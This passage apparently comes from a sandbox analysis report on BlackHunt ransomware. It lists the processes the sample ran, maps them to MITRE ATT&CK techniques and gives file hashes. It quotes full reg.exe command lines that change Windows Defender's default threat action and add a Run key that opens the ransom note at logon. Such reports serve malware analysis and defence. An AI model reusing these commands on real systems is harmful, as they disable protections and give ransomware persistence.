C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2332
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:3012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5912 -ip 59121⤵PID:6456
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD556a91ee4f3b86c2ba18191601183d0bc
SHA12dde2a73cd1970bd29de412c9beca9b12e3f159a
SHA256ace16cf597be0cd803ea831d7f332e33651d54430728344e775a9316ded68f3f
SHA512fcf69444cf0bcd471ab188b94f2571bc5cc24b81053bfa96aebc8feceab5edec9e49a17d765804f43ec9cb250d607a18db6a1c92a7f0c10f6f6863fae69b914d
-
Filesize
12KB
MD5038586e8de0ccf22eb80d339d4d0488b
SHA15853b8da3810576496af3a0fd2f8c7ca8d7fa4fd
SHA25691098e0024286b435f4a8e2314a7ec4a6c2985373cd369e3f804c303896db2e4
SHA51208b1733ef0a9e01f7f5c2df2f031abbdf1533c1267e53cf4f5bde7119253cb52363559a039222069ddee5b24761a6f41d0da5d20ffa254abca89fd7244aaa37c
-
Filesize
684B
MD5ab44e45b22bd767b3db32983cf9b40f6
SHA13a0aa6e41e16beb5a64f488796aa8c8b00341a71
SHA25671e8bbc9f17f8b81f18cdeb903d7ec2e71b799c399a6d47b95abf47c43c0a69d
SHA512048650ff36ad10f98b14b7e187cf8f04651c5d6963c3c6aca5e1f076813f795957f33325b68895f0692c3e302e5fc66d4d5ad6c816ac8a5894c3590a98777ea3